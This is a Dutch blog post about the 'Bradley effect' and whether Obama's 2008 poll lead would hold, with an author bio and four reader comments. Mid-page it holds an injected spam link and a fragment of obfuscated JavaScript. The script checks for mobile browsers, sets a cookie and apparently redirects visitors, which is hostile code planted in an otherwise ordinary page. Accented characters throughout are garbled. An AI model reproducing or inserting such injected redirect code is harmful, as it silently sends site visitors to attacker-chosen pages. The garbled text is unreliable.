Obama en het Bradley effect

Nog een week of twee te gaan tot de Amerikaanse presidentsverkiezingen, en volgens de peilingen heeft Barack Obama nog altijd een comfortabele voorsprong. John McCain begint intussen aardig nerveus te worden en de toon op zijn campagnebijeenkomsten is de laatste tijd dan ook hilarisch hard. De vraag is echter of de voorsprong in de peilingen van Obama zich op 4 november daadwerkelijk vertaalt in een overwinning.

Toen de zwarte democraat Tom Bradley in 1982 in de strijd was om het gouverneurschap van CaliforniAi??, ging hij tot aan de verkiezingen ruim aan kop in de peilingen. Tot ieders verbazing verloor hij uiteindelijk van de republikeinse kandidaat George Deukmejian. Opiniepeilers schreven dit verschijnsel later toe aan het feit dat veel mensen die in de polls zeiden op Bradley te stemmen, dit uiteindelijk in het stemhokje niet deden. Kortom: aan de telefoon met de peilers is iedereen keurig politiek correct, maar met het rode potloodje in de hand komt het sluimerende racisme naar de oppervlakte.

Het Bradley effect is controversieel, maar is opmerkelijk vaak terug te vinden in de electorale geschiedenis van de VS. Niet voor niets is de term al meerdere malen gevallen sinds het moment dat Obama zich kandidaat stelde. Momenteel gaan er echter wilde theorieAi??n over het omgekeerde Bradley effect: Zwarte Amerikanen die tegen de peiler aan de telefoon niet de indruk willen wekken dat zij alleen op Obama stemmen om zijn huidskleur, en dus in de categorie ai???undecidedai??i?? bijgeschreven worden. Op verkiezingsdag zullen zij uiteindelijk tA?ch voor de Democraat stemmen, luidt de theorie.

http://youth-4-elbe.org/?p=2469 Write my paper it|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

4 Reacties op “Obama en het Bradley effect”

  1. Ik begreep juist dat het met die comfortabele voorsprong niet meer zo comfortabel gesteld is.

  2. Ik hoor om het uur andere berichten en vertrouw derhalve niemand meer.

  3. Volgens realclearpolitics.com is zijn gemiddelde voorsprong nog altijd 4.8 procent, en staat hij voor in de belangrijkste swing-states.

  4. Allemaal gelul. Waar twee honden vechten om een been, gaat de derde er mee heen. Ralph Nader wordt dus president.

Laat een bericht achter